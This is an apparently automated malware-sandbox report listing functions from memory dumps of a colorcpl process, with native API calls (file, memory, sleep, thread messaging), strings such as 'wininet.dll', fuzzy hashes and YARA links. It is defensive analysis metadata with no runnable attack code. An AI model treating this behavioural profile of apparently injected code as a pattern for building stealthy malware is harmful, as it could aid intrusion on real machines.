Snapshot File: hcaresult_5_2_4760000_colorcpl.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction ID: a729256797246f4537364d640fc46c9a6fda2af2e20eaffd80dc496e9095dfc6
Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction Fuzzy Hash: 05514E70914A9C8FDB69EF68C8986EEB7F5FB98304F40462ED84AD7210DF309645CB41

Function 0288A350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02884BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02884BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0288A39D

Strings

.z`, xrefs: 0288A38D, 0288A398

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 9352f1a054460b6d3c3e3ef835f3c51ccba40cbc1b3c49e404e172d29156cef6
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 7DF0BDB6200208AFCB08DF88DC84EEB77ADAF8C754F158248BA1D97240C630E8118BA4

Function 0288A3FC Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02884D62,5EB65239,FFFFFFFF,02884A21,?,?,02884D62,?,02884A21,FFFFFFFF,5EB65239,02884D62,?,00000000), ref: 0288A445

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 812ca50ff83fe480692b37d25799524cee555170e303affc6de07c71bbf7608d
Instruction ID: b807e0830190545601e2dc1790d3c69380abf955c93a64c3127dbfc9b37164b0
Opcode Fuzzy Hash: 812ca50ff83fe480692b37d25799524cee555170e303affc6de07c71bbf7608d
Instruction Fuzzy Hash: 81F0E2B6200108ABCB18DF88DC80EEB77A9EF8C714F118248BA1D97245C630E8128BA0

Function 0288A400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02884D62,5EB65239,FFFFFFFF,02884A21,?,?,02884D62,?,02884A21,FFFFFFFF,5EB65239,02884D62,?,00000000), ref: 0288A445

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 81f76cf1d93b6233e1f277781d56e2946f92e222899c409992ebf0c3417118c4
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: E0F0A4B6200208AFCB18DF89DC80EEB77ADAF8C754F158249BA1D97241D630E8118BA0

Function 0288A52A Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02872D11,00002000,00003000,00000004), ref: 0288A569

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c397e281fe5eec2509f839a32940c8b83a254afbab70aa7c82889e9359b75f09
Instruction ID: 6dd146f8f138744f241511ba6d7703871e9b4c9c5599a33525776d2022d33acc
Opcode Fuzzy Hash: c397e281fe5eec2509f839a32940c8b83a254afbab70aa7c82889e9359b75f09
Instruction Fuzzy Hash: AEF0F8B6210208ABDB18DF89DC81EE777A9AF88754F118549BA1897241C631E911CBA0

Function 0288A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02872D11,00002000,00003000,00000004), ref: 0288A569

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: ff243c28abbf09ec76bc74a9f8dd113aa33ab394027c91e75819ad57080fb1be
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 7FF015B6200208AFCB18DF89CC80EAB77ADAF88754F118149BE1C97241C630F810CBA0

Function 0288A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02884D40,?,?,02884D40,00000000,FFFFFFFF), ref: 0288A4A5

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: e1701c70a426e4b577d900084bbe500b6fd3706dba3ce76ea7bbd4ad085ed492
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: F4D0177A200214ABD714EB98CC85EA77BADEF48760F154499BA1C9B282C530FA008AE0

Function 0288A47A Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02884D40,?,?,02884D40,00000000,FFFFFFFF), ref: 0288A4A5

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ac6636927d098083ec32d022959660a9c15f7336b56e9d825ac5b988cf23a93d
Instruction ID: 7edc32a10ec1bb45f33132864beb86a2a9d6c0bfd63dfa296f788842c1e7653b
Opcode Fuzzy Hash: ac6636927d098083ec32d022959660a9c15f7336b56e9d825ac5b988cf23a93d
Instruction Fuzzy Hash: 79E08C7A640200AFD714EFA8CC85EAB7B69EF84350F14455EB91D9B292C530A9008BD0

Function 048D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2CAA

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ac9cf0130992e23276764f7cb54d347769dd5b9e63e0d6a227cf391d3fc50b7b
Instruction ID: a4f15b910ec1295ae7b56a2668f4b64719383a6662055bdfe023badfc9edce83
Opcode Fuzzy Hash: ac9cf0130992e23276764f7cb54d347769dd5b9e63e0d6a227cf391d3fc50b7b
Instruction Fuzzy Hash: FF90023120140416F1007599540865A00058BE1305F55D511A6029655EC665D9D57132

Function 048D2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2C6A

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 22e2516eac0535448c776ad8b678a01f2a896941f727c103f7203e2223a5f525
Instruction ID: 2bec9ce58ca1db34d380f535da4abe670d102f7f8c947198485fe91aeea96a44
Opcode Fuzzy Hash: 22e2516eac0535448c776ad8b678a01f2a896941f727c103f7203e2223a5f525
Instruction Fuzzy Hash: 7D90023120140856F10071594404B5A00058BE1305F55C516A1129754D8615D9957522

Function 048D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2C7A

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02ef55f1e45b97a4105acedcbc420d6abb8a839e9054e6dab8664d24d3e6e3aa
Instruction ID: 24e9ba3d1fc10d63d939ad71bcbf804a22947300e07c3f98cf7dd6979ac44628
Opcode Fuzzy Hash: 02ef55f1e45b97a4105acedcbc420d6abb8a839e9054e6dab8664d24d3e6e3aa
Instruction Fuzzy Hash: CF90023120148816F1107159840475E00058BD1305F59C911A5429758D8695D9D57122

Function 048D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2DDA

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dd8411ee801caa2bfba3fa4e509acb5f06c432e17dd7e0132bf9928a4e90902
Instruction ID: 3ec572ff02e73d0768e4ede96c8d84aa65312070401c121fb8d292a3f571e8ef
Opcode Fuzzy Hash: 4dd8411ee801caa2bfba3fa4e509acb5f06c432e17dd7e0132bf9928a4e90902
Instruction Fuzzy Hash: 85900221242441667545B159440451B40069BE1245795C512A2419A50C8526E99AE622

Function 048D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2DFA

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99d2d6727c7efced7887c56adb6d2e6c50ed2d64d0e9e2160351e1037f73d902
Instruction ID: 41dbfe23da0c1ad322e54196506fff2e992527f1fc9949ac3ad04326f413a77a
Opcode Fuzzy Hash: 99d2d6727c7efced7887c56adb6d2e6c50ed2d64d0e9e2160351e1037f73d902
Instruction Fuzzy Hash: 4790023120140427F1117159450471B00098BD1245F95C912A1429658D9656DA96B122

Function 048D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2D1A

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee0ccf88f5d088b9251c4e08c43c9b7adf3c019a9f56625dbe22493b344e240e
Instruction ID: dbc599ee937619a32d64ff4921773a22e4635d6598796b297183a07b7c9dada8
Opcode Fuzzy Hash: ee0ccf88f5d088b9251c4e08c43c9b7adf3c019a9f56625dbe22493b344e240e
Instruction Fuzzy Hash: F290022921340016F1807159540861E00058BD2206F95D915A101A658CC915D9AD6322

Function 048D2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2EAA

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7faa98705fd0ad3f8a274c666049d88fbc283d848de222c31f0bbfc14b260409
Instruction ID: 3646c038e071abb6173a28303e5733e4fc3cd72203956ccfefcd91fde74f977f
Opcode Fuzzy Hash: 7faa98705fd0ad3f8a274c666049d88fbc283d848de222c31f0bbfc14b260409
Instruction Fuzzy Hash: 5190027120140416F1407159440475A00058BD1305F55C511A6069654E8659DED97666

Function 048D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2FEA

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eea7f53f7ce4f2a30b208bcf79b0ed7ffe4ca48ad33b181ba1fd90e34f0561bc
Instruction ID: a5e2d774316e5360b83d5d07190d88122d832e9375e37e67318a0ec423900f17
Opcode Fuzzy Hash: eea7f53f7ce4f2a30b208bcf79b0ed7ffe4ca48ad33b181ba1fd90e34f0561bc
Instruction Fuzzy Hash: 91900221211C0056F20075694C14B1B00058BD1307F55C615A1159654CC915D9A56522

Function 048D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2F3A

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 707827e8996cd5d163bceae02e853526696e71c8eb241bf5642436c01bfae7c5
Instruction ID: 8bb52b03b04eb97f5bdee456885803c9148213252b437f4019f5fdee4173d096
Opcode Fuzzy Hash: 707827e8996cd5d163bceae02e853526696e71c8eb241bf5642436c01bfae7c5
Instruction Fuzzy Hash: 4B90026134140456F10071594414B1A0005CBE2305F55C515E2069654D8619DD967127

Function 048D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2ADA

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 980e773366e8bdd569e3cdde9292ce64543b253dd2eb6991d69b3538808f3550
Instruction ID: a2c848baf6e4ac350b641c075683fc3af0026c81093720c02718203e0abfd8cb
Opcode Fuzzy Hash: 980e773366e8bdd569e3cdde9292ce64543b253dd2eb6991d69b3538808f3550
Instruction Fuzzy Hash: 53900225211400172105B559070451B00468BD6355355C521F201A650CD621D9A56122

Function 048D2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2BEA

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d298f4bd05128672a222e4ad6cbf8165658a5e55d0405b18693c15838e8ab687
Instruction ID: c36a3e4e214e6d57762d5c9e5bd816e897aa9ed37b9bbf983b7aaaac2409ceaa
Opcode Fuzzy Hash: d298f4bd05128672a222e4ad6cbf8165658a5e55d0405b18693c15838e8ab687
Instruction Fuzzy Hash: 0590023120544856F14071594404A5A00158BD1309F55C511A1069794D9625DE99B662

Function 048D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2BFA

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d885d886b6ec8bd317ead9da050d9d022720a6081e84b724889742dec96ac8c
Instruction ID: 073ee056fa7f4b292c164b5be30022313d8b40e1c34c3d67f47f36b14f7469c7
Opcode Fuzzy Hash: 6d885d886b6ec8bd317ead9da050d9d022720a6081e84b724889742dec96ac8c
Instruction Fuzzy Hash: E690023120140816F1807159440465E00058BD2305F95C515A102A754DCA15DB9D77A2

Function 048D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D2B6A

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad005e60b4c37aa854ffeb92fde0e237c010dafa56d819da11cc55447e4d566f
Instruction ID: f03d43fce1c4b196d45cd53919f0902ed727f5ac75bc975220a5ae50743c6c17
Opcode Fuzzy Hash: ad005e60b4c37aa854ffeb92fde0e237c010dafa56d819da11cc55447e4d566f
Instruction Fuzzy Hash: 639002612024001761057159441462A400A8BE1205B55C521E2019690DC525D9D57126

Function 048D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048D35CA

Memory Dump Source

Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true

Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0660ef8f79e482a8ff4329b480679ddb285e613475a1357f21ef8d0e0d2d28aa
Instruction ID: 2e78869a238973d7ad1079f276c8a13f5a7113937b9c3c23357145356538b27f
Opcode Fuzzy Hash: 0660ef8f79e482a8ff4329b480679ddb285e613475a1357f21ef8d0e0d2d28aa
Instruction Fuzzy Hash: 1890023160550416F1007159451471A10058BD1205F65C911A1429668D8795DA9575A3

Function 02889070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02889118

Strings

net.dll, xrefs: 028890E1, 02889167, 0288913F, 0288914B, 02889173
wininet.dll, xrefs: 028890CE, 028890D7

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
Instruction ID: c090a902ba2c3ba224a79a0879f547ba99bc56a4d64cc1509a4faf42177499aa
Opcode Fuzzy Hash: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
Instruction Fuzzy Hash: E9318FBA904645BBC724EF68C885F77B7B9BB88B04F00841DF62E9B244D734A550CBA5

Function 02889066 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02889118

Strings

net.dll, xrefs: 028890E1, 0288913F, 0288914B
wininet.dll, xrefs: 028890CE, 028890D7

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: ff6d840da868ecd8056f661e5ce4ca667d8f1387524356941f42809760c81a3c
Instruction ID: 386e608a4926a2b1b8c49a510fc65e673808ce12e2a54975b46d452240e2e73e
Opcode Fuzzy Hash: ff6d840da868ecd8056f661e5ce4ca667d8f1387524356941f42809760c81a3c
Instruction Fuzzy Hash: 1421E17E944205BBC714EF68C885B7BF7B5BB88704F00801DE62DEB244D774A510CB94

Function 0288A652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02873AF8), ref: 0288A68D

Strings

.z`, xrefs: 0288A67C, 0288A688

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 97ba378d3454331f77f7e3715e2eb1b0f3aaef5fd42128a76d59f68908f2aafa
Instruction ID: 1ee2b515dfc61b682737c19a8867cc1d28f44403c2b17612de96eeab7fd35db3
Opcode Fuzzy Hash: 97ba378d3454331f77f7e3715e2eb1b0f3aaef5fd42128a76d59f68908f2aafa
Instruction Fuzzy Hash: 2AE0DFFD2482449FC715EF68AC808AB7795AF81305314464AE85D87783D632D9168AE2

Function 0288A660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02873AF8), ref: 0288A68D

Strings

.z`, xrefs: 0288A67C, 0288A688

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 96e3d60a32ce5d733fbea70a3b898c1689417702cef9d998692985abf1d41db3
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: FDE01AB5200204ABD718EF59CC44EA777ADAF88750F014555B91C57241C631E9108AB0

Function 02878308 Relevance: 3.1, APIs: 2, Instructions: 56
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0287836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0287838B

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 322433f781b1f9ff2a1c48445a0b13c92616ab2949e2bf2a417403e70c3a4530
Instruction ID: 79397f4858421697f500566a8a09aa87eec91c3d36f6ae742a89050a8917d367
Opcode Fuzzy Hash: 322433f781b1f9ff2a1c48445a0b13c92616ab2949e2bf2a417403e70c3a4530
